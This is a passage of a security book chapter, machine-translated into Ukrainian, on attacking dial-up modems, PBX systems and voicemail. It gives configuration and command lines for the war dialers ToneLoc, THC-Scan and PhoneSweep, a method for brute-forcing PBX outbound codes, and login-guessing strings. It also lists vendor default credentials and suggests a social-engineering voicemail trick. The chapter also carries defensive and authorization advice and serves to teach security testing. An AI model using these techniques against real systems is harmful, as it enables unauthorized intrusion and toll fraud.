Уразливість видалених з'єднань, PBX, VOICEMAIL
і віртуальних приватних мереж
Зазвичай організації менше всього уваги приділяють старим забутим телефонним лініям. Ці дроти, що опоясали весь світ, сьогодні забуті. У цьому розділі буде показано, як старенький модем з пропускною спроможністю 9600 Кбіт в секунду може поставити на коліна мережевого Голіафа з капшуком системним захистом.
Може здатися, що автори вирішили почати розділ, присвячений мережевим атакам, із застарілої інформації про хакинге аналогових видалених з'єднань. Не дивлячись на повсюдне розповсюдження Internet, звичайні телефонні мережі PSTN (Public Switched Telephone Network) сьогодні достатньо часто використовуються для зв'язку з домашніми і навіть службовими комп'ютерами. Тому сенсаційні історії про злом вузлів Internet меркнуть перед прозаїчнішими розповідями про вторгнення через видалені з'єднання, оскільки останні є більш руйнівними і простіше здійснимими.
Насправді для великих компаній набагато більшу небезпеку представляють погано інвентаризовані модемні лінії, чим захищені брандмауерами шлюзи Internet. Згаданий вище експерт в області безпеки компанії At&t Біл Чесвік (Bill Cheswick) охарактеризував брандмауер як панцир черепахи. Насправді, навіщо атакувати неприступний брандмауер, коли можна пробратися безпосередньо до "тіла" цільової системи через погано захищений сервер видаленого доступу? Мабуть, захист видалених з'єднань — найбільш важливий аспект побудови лінії кругової оборони.
Хакинг
видалених з'єднань виконується по класичній схемі: спочатку виконується попередній збір інформації, потім — сканування, інвентаризація і, нарешті, атака. В більшості випадків цей процес можна автоматизувати за допомогою традиційних хакреських засобів, що отримали назву сканерів телефонних номерів (demon dialer) або програм автопрозвона (wardialer). По суті, ці засоби програмно встановлюють видалене з'єднання з великою кількістю телефонних номерів, реєструють ті з них, по яких встановлюються модемні з'єднання, намагаються ідентифікувати систему на іншому кінці телефонної лінії і по можливості реєструватися в системі, підібравши ім'я користувача і пароль. Якщо для цього потрібне спеціальне програмне забезпечення або конкретні знання про систему, установка з'єднання може виконуватися уручну.
Вибір сканера телефонних номерів — камінь спотикання як для зловмисників, так і для легальних фахівців з пошуку незахищених видалених з'єднань. У цьому розділі ми розглянемо дві найбільш популярні програми такого типу, які можна безкоштовно завантажити з Internet (Toneloc і Thc-scan), а також комерційний продукт Phonesweep від компанії Sandstorm Enterprises.
Після обговорення цих програм будуть розглянуті прийоми, вживані проти виявлених сканерами телефонних номерів систем уручну або в автоматичному режимі, зокрема внутрішні телефонні мережі компаній (мережі РВХ) або системи голосової пошти (voicemail).
На завершення ми торкнемося іншого аспекту систем видаленого доступу і опишемо віртуальні приватні мережі VPN (Virtual Private Networking). Хоча такі мережі є достатньо захищеними і на них покладаються основні надії в області розвитку корпоративних мереж, питання безпеки для них — не дозвільний. До теперішнього часу відомий лише один випадок злому таких мереж, який і буде розглянутий в цьому розділі разом із загальними міркуваннями про перспективи цієї життєво важливої технології.
Попередній збір даних про телефонні номери
Хакинг видалених з'єднань починається з визначення діапазону телефонних номерів, з якими працюватиме сканер. Справжні хакери зазвичай вибирають компанію-жертву і збирають інформацію про використовуваних нею телефонних номерах з самих різних джерел. Нижче будуть описані деякі механізми для обмеження сфери розповсюдження такої інформації.
Насамперед хакери вивчають телефонні довідники. Багато компаній продають компакт-диски з телефонними довідниками, якими можна скористатися для злому видалених з'єднань. Визначивши основний телефонний номер, зломщики зазвичай "досліджують" схожі з ним номери. Наприклад, якщо відомо, що основний номер компанії Acme Corp. — 555-555-1212, то для сканера телефонних номерів хакер задасть діапазон 555-555-хххх, щоб перевірити все 10000 схожих телефонних номерів. За наявності декількох модемів таку кількість номерів можна перепробувати за декілька днів за допомогою майже будь-якої програми-сканера.
Ще один
спосіб отримання інформації про телефонні номери — подзвонити на місцеву АТС і спробувати дізнатися номери "з перших вуст" необачних службовців. Це хороший спосіб отримання номерів, що не афішуються, вживаних для видалених з'єднань і центрів даних, в яких префікс зазвичай відрізняється від префікса основного телефонного номера. Багато телефонних компаній на вимогу клієнта заносять цю інформацію в розряд секретною і не розголошують її без надання пароля, проте відома безліч випадків порушення таких домовленостей і розголошування інформації.
Окрім телефонних довідників, джерелом подібних відомостей є Web-узлы корпорації. Багато компаній, втративши пильність від свободи розповсюдження інформації в Internet, публікують списки своїх телефонних номерів на Web-узлах. Цього не варто робити, якщо тільки це не обумовлено характером діяльності.
Телефонні номери можна знайти в найнесподіваніших місцях Internet. Одне з найбільш небезпечних місцеположень в сенсі накопичення інформації вже згадувалося в розділі 1, проте варто повернутися до нього ще раз. Відомості про контактні телефони, а також іншу технічну і адміністративну інформацію про компанії, представлені в Internet, можна отримати з реєстраційної бази даних імен Internet, підтримуваної центром INTERNIC (відомою також як Network Solutions), через інтерфейс whois за адресою
http://www.networksolutions.com/cgi-bin/whois/whois/.
Ось результат пошуку по ключовому слову acme. com, що містить як відкриту, так і закриту інформацію з бази даних
INTERNIC.
Registrant: Acme, Incorporated (ACME-DOM)
Princeton Rd. Hightstown, NJ 08520
US Domain Name: ACME.COM
Administrative Contact: Smith,john (JSOOOO) jsmith@acme.COM
555-555-5555 (FAX) 555-555-5556
Technical Contact, Zone Contact: ANS Hostmaster (AH-ORG)
hostmaster@ans.NET
(800)555-5555
Тепер хакери мають не тільки хорошу відправну крапку для роботи сканера телефонних номерів, але і кандидатуру співробітника (John Smith) під ім'ям якого можна здійснювати свою діяльність по збору додаткової інформації. Окрім цього деяку корисну інформацію можна почерпнути з розділу технічних контактів. А саме тут видно, як інформація фіксується в базі даних INTERNIC. Це вже дещо.
І нарешті, якщо уручну набирати підряд будь-які телефонні номери, то рано чи пізно можна почути: "Корпорація XYZ слухає". Це кінцево достатньо утомливий спосіб попереднього збору даних, але в той же час дуже ефективний. Ще однією слабкою ланкою в системі телекомунікації компанії є автовідповідачі, які можна використовувати проти службовців компанії. Наприклад, від імені віце-президента компанії по питаннях маркетингу можна залишити наступне повідомлення системного адміністратора: "Привіт, це Джим. Терміново зміни мій пароль".
Усунете просочування інформації
Кращим
захистом проти попереднього збору інформації по телефону є запобігання просочуванню інформації. Звичайно ж, для забезпечення можливості ділових контактів необхідно роздавати телефонні номери компанії, але дуже обережно. Зв'яжіться зі своїм оператором і погоджуйте з ним перелік відкритих телефонних номерів, список осіб, що мають доступ до закритої інформації, а також пароль для отримання яких-небудь закритих даних. Організовуйте групу по усуненню просочування інформації з числа співробітників відділу інформатизації, яка стежитиме за тим, щоб закриті телефонні номери не розповсюджувалися через Web-узлы, служби каталогів, сервери видаленого доступу і так далі Зв'яжіться з компанією INTERNIC і "почистите" контактну інформацію для зони Internet. І нарешті, попередите користувачів, що телефон не завжди друг, тому потрібно бути проявляти обережність в розмовах з незнайомцями і не розголошувати ніякої закритої інформації.
Сканери телефонних номерів
Процес
підбору телефонних номерів багато в чому визначається використовуваними для цього засобами. Тому далі будуть охарактеризовані конкретні продукти, такі як Toneloc, Thc-scan і Phonesweep, Проте спочатку приведемо деякі загальні міркування.
Апаратні засоби
При підборі телефонних номерів
питання
вибирання апаратних засобів не менш важливе, чим вибір програмного забезпечення. Нижче ми розглянемо два безкоштовні програмні засоби, призначених для операційної системи DOS і таких, що здобули незаслужену репутацію тих, що важко настроюються. Проте для налаштування будь-якої програми автопрозвона потрібне тонке знання СОМ-ПОРТОВ комп'ютера, а на деяких апаратних конфігураціях ці програми можуть не працювати взагалі, наприклад на переносному комп'ютері з інтерфейсом PCMCIA. Звичайно ж, не варто переоцінювати вимоги до апаратних засобів: типовий персональний комп'ютер з двома стандартними СОМ-ПОРТАМІ і послідовною платою для додавання ще два цілком підійде для цих цілей. В той же час, для професійної
системи автопрозвона можна встановити багатопортову карту Digitboard, що дозволяє підключити до системи від 4 до 8 модемів одночасно.
Апаратні
засоби — головний чинник, що визначає швидкість і ефективність. Сканери телефонних номерів можуть бути надмірно обережними: часто перед набором наступного номера вони витримують паузу в декілька секунд, щоб не упустити потенційну мету із-за перешкод на лінії або інших чинників. Якщо
період очікування складає 45-60 секунд, то програма автопрозвона на кожен дзвінок витрачає приблизно хвилину. Шляхом нескладних арифметичних обчислень можна визначити, що для перевірки діапазону в 10000 номерів одному модему знадобиться сім повних діб. Очевидно, що додавання кожного нового модему істотно прискорює процес — чотири модеми працюють удвічі швидше, ніж два. Оскільки підбір номерів можна виконувати тільки в непіковий час (див. наступний розділ), то ніж більше модемів задіяно в цій операції — тим краще.
Значний вплив на швидкість процесу надає також тип модему. Сучасні модеми, як правило, голосові. Визначення голосу дозволяє при підборі номери відразу ж зареєструвати номер телефону як "голосовий", відключитися і продовжувати дозвон по наступному номеру, не чекаючи закінчення заданого інтервалу часу (45-60 секунд). Оскільки значна частка телефонних номерів виділена для голосових ліній, то їх виявлення значно прискорює процес підбору номера телефону для модемних з'єднань. У документації до обох програм Thc-scan і Phonesweep рекомендується використовувати модем USR Courier, як найбільш надійний. Крім того, в документації по Thc-scan рекомендується також використовувати модем Zyxel Elite, а в документації по Phonesweep — Zyxel U-1496e
fax/voice.
Легалізація діяльності
Разом з питаннями вибору апаратної
платформи для підбору номерів потенційні зломщики серйозно розглядають питання законності своєї діяльності. У деяких країнах заборонено послідовно набирати велике число номерів, і телефонні компанії уважно стежать за дотриманням цієї вимоги, а часто їх устаткування просто не дозволяє цього робити. Звичайно ж, всі програми, що розглядаються тут, розбивають заданий діапазон номерів на випадкові інтервали, щоб уникнути порушення таких вимог, але це все ж таки не гарантує від попадання в "чорний список". Тому фахівці, що займаються подібною діяльністю на законних підставах, повинні легалізувати свої дії і отримати письмовий дозвіл від компанії-замовника на проведення такого тестування. У цьому документі необхідно вказати діапазон сканованих телефонних номерів, щоб покласти відповідальність за вихід з діапазону на ту, що виконує підбір номера організацію.
У угоді
необхідно також вказати час доби, коли компанія-замовник вважає за краще виконувати тестування. Як уже згадувалося, сканування телефонних номерів в робочий час може негативно відбитися на ефективності роботи компанії, тому таку діяльність зазвичай відкладають на пізній вечір або нічний час.
Пам'ятаєте, що сканування телефонних
номерів з включеним ідентифікатором CALLERLD, що означає можливість автоматичного визначення номера, рівнозначно передачі візитної картки по кожному з номерів, що набирають вами. Багатократне повторення дзвінків з одного джерела викличе підозру у цільової компанії, тому варто відключити режим автоматичного визначення номера на своїй телефонній лінії (звичайно ж, якщо у вас є дозвіл на подібну діяльність, то це не критично). Не слід забувати і тому, що при дзвінках по номерах з префіксом 800 номер що дзвонив фіксується у будь-якому випадку незалежно від статусу CALLERLD, оскільки в цій ситуації розмова оплачується стороною, що відповідає.
Вартість телефонних переговорів
І нарешті, не забувайте про те, що підбір номерів видалених цільових організацій оплачується за міжміським тарифом телефонних переговорів. Тому приготуйтеся до отримання значних рахунків за телефонні переговори і заздалегідь погоджуйте питання їх оплати із замовником.
У наступних розділах будуть детально розглянуті питання налаштування кожного програмного засобу, щоб читачі змогли легко скористатися цими програмами. Проте в книзі будуть описані далеко не всі можливості цих програм.
Програмне забезпечення
Оскільки сканування телефонних номерів зазвичай виконується вночі протягом невеликих інтервалів часу, то важливою вимогою до відповідних програм є можливість гнучкого налаштування графіка роботи і запам'ятовування вже відсканованих номерів. Безкоштовні програми Toneloc і Thc-scan регулярно зберігають результати своєї роботи у файлах даних, забезпечуючи тим самим можливість продовження роботи після подальшого перезапуску. Крім того у них є певні засоби для завдання часу почала і закінчення роботи протягом однієї доби. Проте для виконання тривалих операцій сканування протягом декількох днів користувач повинен вважатися на можливості операційної системи по плануванню виконання завдань або написати спеціальний сценарій. Програма Phonesweep дозволяє повністю автоматизувати режим роботи.
Може здатися, що автори упереджено відносяться до програм Toneloc і Thc-scan, проте вони прагнуть бути об'єктивними. Звичайно, комерційна програма Phonesweep значно полегшить життя консультантам по безпеці, яким необхідно отримати максимальний результат ціною мінімальних зусиль. Можливості цієї програми відповідають її ціні, тому не варто відмовлятися і від послуг безкоштовних програм Toneloc і Thc-scan. При регулярній інтенсивній роботі Phonesweep себе окупає, проте не має сенсу платити гроші, якщо аудит доводиться виконувати лише раз на півроку.
Програма Toneloc
Одній з перших і найбільш популярних програм телефонного сканування є утиліта Toneloc компанії Minor Threat&mucho Maas (назва Toneloc розшифровується як Tone Locator). Цю програму можна знайти на вузлі компанії, а також на безлічі хакреських вузлів в Internet. Подібно багатьом програмам-номеронабирачам, Toneloc працює під управлінням DOS (або у вікні DOS операційної системи Win 9x або NT), а також з емулятором DOS в UNIX. Протягом багатьох років ця утиліта була ефективним засобом для хакерів і консультантів по безпеці. На жаль, творці Toneloc не стежать за оновленням своєї програми, і ніхто із співтовариства фахівців з безпеки не приймав участі в її розробці. Тому для оцінки захищеності Web-узла краще використовувати більш робастную програму Thc-scan.
Програму Toneloc
легко встановити і застосовувати для базових операцій телефонного сканування, проте використання розширених можливостей цієї програми вимагає деяких навиків. Спочатку з командного рядка необхідно запустити просту утиліту TLCFG, що виконує запис основних параметрів конфігурації модему у файл TL.CFG, Toneloc, що перевіряється при запуску (при цьому мають бути встановлені порт СОМ, адреса порту введення-виводу і номер переривання). Вікно програми TLCFG.EXE показано на мал. 9.1.
Після цього з командного рядка можна запустити саму програму Toneloc, вказавши діапазон сканованих телефонних номерів, ім'я файлу даних для запису результатів і будь-які інші опції в наступному форматі.
Toneloc [Файлданних] /м:[Маска] /r:[Діапазон] /X:[Іськмаська] /d:[Іськдіапазон]
/З:[Коїфіг] /#:[Число] /s:[Времяначала] /е:[Времяеаверш]
/Н:[Годинник] /т /к
[Файлданних] - файл для зберігання даних (можливо, маска)
[Маска] - Маска для телефонних номерів у
форматі 555-хххх [Діапазон] - діапазон телефонних номерів у форматі
5000-6999 [Іськмаська} - маска для виключення з сканування у форматі
1ххх [Іськдіапазон] - діапазон для виключення з сканування у форматі
2500-2699 [Конфіг] - використовуваний файл конфігурації [Число] -
кількість виконуваних дзвінків у форматі 250
[Времяначала]- час почала сканування у форматі 9:30р
[Времязаверш]- час завершення сканування у форматі 6:45а
[Годинник] - максимальне число годинника сканування у форматі 5:30 (перекриває [Времязаверш])
/Т = Tones, /к = Carriers (перекривають дані файлу конфігурації).
Як буде видно з подальшого матеріалу, утиліта Thc-scan використовує дуже близький список параметрів. У приведеному нижче прикладі утиліта Toneloc скануватиме всі телефонні номери від 555-0000 до 555-9999 і записувати інформацію у файл test. На мал. 9.2 показана програма Toneloc у дії.
toneloc test /m:555-хххх /r:0000-9999
Утиліта Toneloc має безліч інших можливостей для досвідченіших користувачів, описаних в керівництві користувача (TLUSER.DOC), проте для виконання базових операцій по підбору номера перерахованих параметрів цілком хапає. Приведемо ще один параметр, задаючий період очікування і використовуваний для тестування мереж РВХ. Цей параметр дозволяє дочекатися гудка після набору основного номера і ввести код для виконання витікаючих дзвінків з внутрішньої телефонної станції РВХ.
toneloc test /m:555-xxxxwxxx
При такому форматі команди набирається номер 555-9999, потім робиться пауза для появи гудка, а потім перевіряються всі можливі комбінації з трьох цифр (ххх) для отримання коди для виконання витікаючих дзвінків з мережі РВХ. Утиліта Toneloc може вгадувати навіть чотиризначні коди. Можливо, це переконає читачів в небезпеці використання видалених з'єднань з мережами РВХ або хоч би змусить використовувати довші коди.
Програма Thc-scan
Слабкі сторони утиліти Toneloc компенсує програма Thc-scan, створена членом хакреської групи The Hacker's Choice з Німеччини Ван Хаузером (van Hauser)
(http://www.infowar.co.uk/thc/). Подібно Toneloc, утиліта Thc-scan теж настроюється і запускається в операційній системі DOS, у вікні DOS Win 9x або з консолі Windows NT, а також з використанням емулятора Dos під UNIX.
Мал. 9.1. Використання програми TLCFG.EXE дм введення конфігураційних параметрів модему, вживаною утилітою Toneloc
Мал. 9.2. Утиліта Toneloc в процесі сканування великого числа телефонних номерів у пошуках інших модемів
Перед використанням утиліти Thc-scan спочатку за допомогою програми TS-CFG необхідно згенерувати файл конфігурації (. CFG). Ця утиліта конфігурації має ширші можливості, ніж програма TLCFG для Toneloc. Більшість параметрів конфігурації достатньо прості, але для нестандартного налаштування буде потрібно вичерпні знання СОМ-ПОРТОВ. Основні параметри конфігурації перераховані в наступній таблиці
Порт СОМ
|
Номер переривання
|
Порт введення-виводу
|
1
|
4
|
3F8
|
2
|
3
|
2F8
|
3
|
4
|
Зе8
|
4
|
3
|
2Е8
|
|
|
|
Для визначення цих параметрів застосовується утиліта MOD-DET, включена в комплект постачання Thc-scan (на повідомлення Windows про помилки можна не обертати уваги), результат роботи якої виглядає таким чином.
MODEM DETECTOR v2.00 (c) 1996,98 by van Hauser/thc
<vh@ reptile.rug.ac.be>
Get the help screen with : MOD-DET.EXE ?
Identifying Options...
Extended Scanning : NO
Use Fossil Driver : NO (Fossil Driver not present)
Slow Modem Detect : YES
Terminal Connect : NO
Output Filename : <none>
Autodetecting modems connected to COM 1 to COM 4 ...
COM 1 - None
Found
COM 2 - Found! (Ready) [Irq: 3 | Baseadress: $2F8]
COM 3 - None Found COM 4 -
None Found
1 Modem(s) found.
Після
створення файлу конфігурації . CFG можна приступати до сканування телефонних номерів. Синтаксис команди Thc-scan дуже нагадує формат Toneloc і має лише декілька відмінностей. (Перелік можливих параметрів дуже великий, тому тут він приводитися не буде. Його можна знайти в четвертій частині керівництва THC-SCAN.DOC, що входить в комплект постачання програми.) Навіть в процесі роботи Thc-scan дуже нагадує утиліту Toneloc (мал. 9.3).
Мал. 9.3. Сканування телефонних номерів за допомогою утиліти Thc-scan
Установка режиму сканування виконується уручну за допомогою ключів /s і /е, задаючих час почала і закінчення процесу відповідно. Для повторення цього процесу щодня потрібно використовувати вбудовані засоби планування завдань операційної системи, наприклад команду AT служби Scheduler системи Windows NT. Автори книги зазвичай записують параметри запуску Thc-scan в простій командний файл, який потім викликається програмою AT Scheduler. При плануванні графіка роботи утиліти THC-SCAN.EXE необхідно пам'ятати, що відповідний файл конфігурації . CFG обов'язково повинен знаходитися в поточному каталозі, якщо не задана опція /!. Оскільки служба Scheduler запускає команди з каталога %systemroot%, для файлу конфігурації утиліти THC-SCAN.EXE необхідно задати абсолютний шлях, як показано в наступному прикладі.
Приведемо приклад командного файлу thc.bat.
@@echo off
rem Make sure thc-scan.exe is in path
rem absolute path to .cfg file must be specified with /! switch if run
from AT scheduler
rem if re-running а scan, first change to directory with appropriate .DAT
file and delete /p: argument
C:\thc-scan\bin\thc-scan.EXE test /m:555-xxxx /r:0000-9999
/!:C:\thc-scan\bin\thc-scan.CFG /p:test /f /3:20:00 /e:6:00
Після запуску цього командного файлу утиліта Thc-scan виконуватиме сканування з 8 годин вечора до 6 годин ранку. За допомогою наступної команди можна забезпечити щоденний запуск утиліти:
at 7:58p /interactive /every:1 C\:thc-scan\bin\thc.bat
Утиліта
Thc-scan створює файл даних . DAT і прочитує з нього інформацію за попередні дні до тих пір, поки не відсканує всі номери діапазону. Не забудьте видалити всю інформацію, що залишилася після завершення роботи утиліти Thc-scan, за допомогою команди at /delete.
Для користувачів, що
виконують сканування телефонних номерів за допомогою декількох модемів або декількох клієнтів мережі автор утиліти написав простий командний файл NETSCAN.BAT, THC-MISC, що міститься в архіві.ZIP, що входить в комплект постачання утиліти. Внісши до цього файлу невеликі зміни, описані в другій частині керівництва THC-SCAN.DOC, цей сценарій можна використовувати для автоматичного ділення діапазону телефонних номерів і створення окремих DAT-файлов для кожного клієнта або модему. Щоб набудувати утиліту Thc-scan для використання декількох модемів, виконаєте наступні дії.
1. Створіть для кожного модему окремий каталог, помістите в нього копію утиліти Thc-scan і файл конфігурації, відповідний цьому модему.
2. Внесіть зміни до файлу NETSCAN.BAT, описані в керівництві THC-SCAN.DOC. Кількість модемів задайте в рядку SET Clients=, розташованому в розділі [2] командного файлу NETSCAN.BAT.
3. Введіть команду netscan.bat [маска з'єднання] [число модемів].
4. Помістите кожен файл . DAT в каталог відповідного модему. Наприклад, при використанні команди netscan 555-xxxx 2 для двох модемів результуючий файл 2555xxxx.DAT помістите в каталог, відповідний модему № 2 (наприклад \thc-scan\bin2).
При
пошуку телефонних номерів, використовуваних для модемних з'єднань, утиліта Thc-scan може відправляти модему, що відповів, декілька рядків, заданих у файлі конфігурації. Цей режим можна встановити за допомогою параметра carrier Hack Mode утиліти TS-CFG, а само вміст цих рядків — за допомогою параметра Nudge. За умовчанням пропонується наступне повідомлення.
^~^~^~^~^~^M^~^M?^M^~help^M^~^~^~guest^M^~guest^М^~INFO^M^MLO
(^~ означає паузу, а ^М — повернення каретки). Стандартний текст повідомлення у багатьох випадках працює досить добре, але для досягнення конкретної мети цей текст можна змінити.
Після
закінчення процесу сканування
необхідно проаналізувати різні журнали. Важливою перевагою утиліти Thc-scan є можливість запису інформації, що вводиться, в текстовий файл, придатний для використання надалі. Проте в процесі управління даними багато інформації доводиться вводити уручну. Утиліта Thc-scan може генерувати величезні об'єми інформації для подальшого аналізу, включаючи список
отськанірованих телефонних номерів, знайдені модеми, виявлені типи систем і так далі Вся ця інформація записується у файли трьох типів: DAT-файлы, файли бази даних . D3, які потім можна імпортувати в ODBC-совместимую базу даних (ця опція задається за допомогою ключа /f), і декілька LOG-файлов, що містять списки телефонних номерів, які були зайняті, по яких відповів модем, а також перелік відгуків модемів. Файл бази даних можна аналізувати в будь-якій системі управління базою даних, але в нім відсутня інформація про відгуки модемів. Інформація про відгуки модемів міститься в журналі CARRIERS . LOG, і її узгодження з інформацією бази даних треба проводити уручну. Такий аналіз запрошень системи, що відповіла, все одно часто доводиться виконувати уручну для подальшого
проникнення в систему, проте для великих діапазонів сканованих номерів дуже складно уручну скласти вичерпний звіт, що відображає основні результати.
Питання управління даними значно ускладнюється при використанні декількох модемів. Як видно з описаного вище процесу, для кожного модему настроюється і запускається свій екземпляр утиліти Thc-scan і загальний діапазон телефонних номерів потрібно уручну розділити між модемами. Результуючі DAT-файлы можна об'єднати за допомогою утиліти DAT-MERGE.EXE, вхідної в комплект постачання утиліти Thc-scan, проте файли журналів реєстрації відповідей модемів теж потрібно об'єднувати уручну.
Незважаючи
на ці незручності, утиліта Thc-scan є чудовим безкоштовним засобом для телефонного сканування і її автор гідний якнайкращих слів подяки. Як буде видно з подальшого матеріалу, продукти, що володіють більшою простотою і ефективністю, коштують достатньо дорого.
Програма Phonesweep
Якщо, на ваш погляд, використання утиліти Thc-scan вимагає дуже великих зусиль, то вам підійде програма Phonesweep. Цю програму поширює компанія Sandstorm Enterprises
(http://www.sandstorm.net). Питанням установки і використання безкоштовних програм телефонного сканування було приділено достатньо багато уваги. Розповідь про Phonesweep буде значно коротша, оскільки практично все зрозуміло з самого інтерфейсу користувача (мал. 9.4).
Основними перевагами Phonesweep є простій графічний інтерфейс, автоматичне планування завдань, можливість проникнення в систему, одночасна підтримка декількох модемів і витончена звітність. Для кожного модему задається діапазон номерів (профіль) . Поточна версія програми підтримує до чотирьох модемів. За допомогою прапорців Business Hours, Outside Hours і Weekends утиліту Phonesweep легко набудувати для використання в робочий час, неробочий годинник і вихідні, як показано на мал. 9.5. Конкретний годинник робочого часу задається у вкладці
Options>time. Утиліта Phonesweep безперервно виконуватиме сканування у вказаний період часу (звичайно це неробочий час або вихідні, що задаються прапорцями Outside Hours і Weekends) до тих пір, поки не буде перевірений весь діапазон.
Утиліта Phonesweep розрізняє 205 різних типів пристроїв видаленого доступу (їх повний список приводиться за адресою
http://www.sandstorm.net/phoneswep/ sysids.shtml). Вона виконує ідентифікацію, порівнюючи текстові або бінарні
рядки, що отримуються як відгук модему, з базою даних відомих відгуків. Якщо відгук модему настроювався уручну, то утиліта Phonesweep його не розпізнає. Щоб забезпечити ідентифікацію всіх можливих систем, потрібно включити в звіт всі відгуки всіх можливих модемів, а потім проаналізувати цей список уручну.
Мал. 9.4.
Графічний інтерфейс утиліти Phonesweep значно перевершує можливості інтерфейсу безкоштовних програм і включає безліч засобів, що підвищують ефективність і що полегшують використання
Мал. 9.5. Утиліта Phonesweep дозволяє легко настроювати графік роботи
Окрім виявлення стандартних модемів, утиліта Phonesweep дозволяє реалізовувати типові атаки проти них. У текстовому файлі
bruteforce.txt, розташованому в каталозі додатку, міститься перелік імен користувачів і паролів, які передаються у відповідь на запрошення модему. Якщо з'єднання розривається, утиліта Phonesweep знову набирає номер і пробує скористатися наступним варіантом відгуку, поки не буде вичерпаний весь список (використовуючи цю утиліту для тестування захищеності свого сервера видаленого доступу, остерігайтеся можливості блокування облікового запису). Одне тільки цей засіб коштує грошей, витрачених на покупку Phonesweep, оскільки дозволяє автоматизувати операції. які зазвичай виконуються уручну (див. наступний розділ).
Ще однією важливою перевагою утиліти Phonesweep є вбудована база даних SQL для реєстрації результатів сканування. Завдяки її наявності відпадає необхідність проглядання текстових файлів уручну або приведення даних з різних форматів до єдиного формату електронних таблиць (що доводиться робити при
використанні безкоштовних програм). Тут є лише один шаблон звіту, проте він дуже витончений, містить дійсно корисну інформацію в табличному вигляді, а також можливість додавання в звіт відгуків ідентифікованих модемів (додаток А) і всього списку телефонних номерів (додаток В) у форматі RTF. Фрагмент звіту утиліти Phonesweep приведений на мал. 9.6.
Звичайно,
основною відмінністю між Phonesweep і безкоштовними програмами є ціна. Під час написання цієї книги існували дві версії програми Phonesweep: Phonesweep Basic, що підтримує один модем і до 800 номерів на профіль вартістю $980 (вартість додаткової підтримки цієї версії протягом року складає $196), і Phonesweep Plus, що підтримує до 4 модемів і 10000 номерів на кожен профіль вартістю $2800 (вартість додаткової підтримки цієї версії протягом року складає $560). Для захисту від неліцензійного копіювання програми використовується апаратна заглушка, що підключається до паралельного порту, без якої програма не працює. Враховуючи вартість зусиль, витрачених на установку, налаштування і обробку результатів безкоштовних програм, ціна $2800 виглядає не так страхітливо.
Мал. 9.6. Невеликий фрагмент звіту утиліти Phonesweep одночасно демонструє рівень деталізації і узагальнення результатів єдиного вбудованого шаблону звіту
Цікаві результати порівняння програм Phonesweep і Thc-scan, отримані, із зацікавленого джерела — від компанії Sandstorm
Enterprises, Inc., можна знайти за адресою http: //geek-girl. com/bugtraq/1998_4/0770
.html.
Але який би засіб ми ні вилай, важливо розуміти, що ми хочемо отримати у результаті. Про це буде розказано в наступному розділі.
Способи проникнення в систему через модем
Сканування телефонних номерів переслідує мета виявити потенційні крапки для подальшого вторгнення в систему через модемне з'єднання, проте найчастіше для визначення ступеня уразливості видаленого з'єднання потрібний уважний аналіз звітів. Наприклад, з наступного фрагмента файлу CARRIERS . LOG, що згенерував утилітою Thc-scan, видно типові відгуки модемів. Скорочено цей файл декілька подредактірован. Подібні дані містяться і в додатку А звіту утиліти Phonesweep.
23-05-1997 14:57:50 Dialing... 95552851
CONNECT 57600
Нр995-400:_
Expected а HELLO command. (CIERR 6057)
23-05-1997 20:08:39 Dialing... 95552349
CONNECT 57600
@ Userid:
Password?
Login
incorrect
23-05-1997 21:48:29 Dialing... 95552329
CONNECT 57600
Welcome to 3com Total Control Hiper ARC (ТМ)
Networks That Go The Distance (ТМ)
login:
Password:
Login Incorrect
23-05-1997 21:42:16 Dialing... 95558799
CONNECT 57600
._Please press <Enter>..._I Pjack Smith_jack
SMITH [CARRIER LOST AFTER 57 SECONDS]
Автори
умисне вибрали ці приклади, щоб показати неоціниме значення досвіду роботи з різними серверами видалених з'єднань і операційними системами. Наприклад, перший відгук, схоже, поступив від системи HP (Hp995-40c), проте подальший рядок з інформацією про команду HELLO виглядає чудно. При установці з'єднання з цією системою уручну за допомогою стандартного програмного забезпечення (автори книги віддають перевагу програмі Procomm Plus, поширюваній компанією Symantec Corp, і представлену за адресою
http://www.Symantec, соm/рrосоrоm/procomm.html оскільки з її допомогою можна емулювати термінал Vt-100 на основі протоколу ASCII) користувача чекає такий же незрозумілий результат. Для прояснення ситуації зломщик має бути знайомий з системами Мре-xl від Hewlett-packard і знати, що у відповідь на запрошення потрібно ввести команду HELLO ім'я. ПОЛЬЗ, а потім пароль. Тому має сенс скористатися утилітою Procomm Plus і ввести наступну інформацію.
CONNECT 57600
Нр995-400: HELLO FIELD.SUPPORT
PASSWORD» Telesup
Як ім'я користувача і пароль в HP-системах за умовчанням застосовуються FIELD. SUPPORT і Telesup відповідно. Таким чином, за наявності багатого досвіду і витраті мінімальних зусиль можна виявити проломи в таких місцях, де непідготовлені користувачі виявлять лише непробивну стіну.
Другий приклад відгуку в приведеному фрагменті звіту дещо простіше. Синтаксис @Userid свідчить про виявлення сервера видаленого доступу Lanrover виробництва компанії Shiva Corp. (тепер вона є частиною корпорації Intel). Утиліта Phonesweep автоматично визначає системи Lanrover по цьому рядку. На основі цієї інформації і в результаті вивчення Web-узла
http: //www.shiva.com хакер зможе дізнатися, що системи Lanrover можна конфігурувати для аутентифікації видалених користувачів. При цьому часто використовується ім'я користувача supervisor або admin з паролем NULL. Ви навіть уявити собі не можете, як часто такі дані спрацьовують проти ледачих адміністраторів.
Третій приклад демонструє, наскільки корисними можуть опинитися навіть елементарні знання про виробника і модель системи. Широко відомо, що для пристроїв видаленого доступу 3com Totalcontrol Hiper ARC існує "резервний" обліковий запис adm з паролем NULL
(http://geek-girl.com/bugtraq/1998_4/0682.html). Тому такі системи є широко відкритими (якщо цей прорахунок ще не усунений).
У останньому прикладі зафіксований відгук програми управління видаленим доступом pcanywhere від компанії Symantec. Якщо власник системи Джек Сміт не полінувався встановити хоч би символічний пароль, то система практично невразлива. Але двоє з трьох користувачів pcanywhere ігнорують подібні заходи (і це дійсно так!). Докладніша інформація про pcanywhere і інші подібні програми міститься в розділі 13.
Вище вже згадувалося про те, що інтерес для хакерів представляють не тільки модеми, але і мережі РВХ, а також системи голосової пошти. Зокрема, системи РВХ, конфігуровані для забезпечення видалених витікаючих з'єднань, при введенні коректної коди відповідають гудком (див. вище опис програми Toneloc). Тому при неправильному налаштуванні ці засоби забезпечують зломщикові можливість здійснення телефонних дзвінків в будь-яку точку миру за чужий рахунок. Не забувайте про це, перевіряючи захищеність своєї системи.
Опис
всіляких відгуків видалених систем міг би зайняти всю частину цієї книги, що залишилася, проте навіть з цього короткого прикладу видно, які типи систем можна виявити при перевірці захищеності вашої організації. Пам'ятаєте про можливі проломи в захисті і консультуйтеся з фахівцями, включаючи розробників.
А що
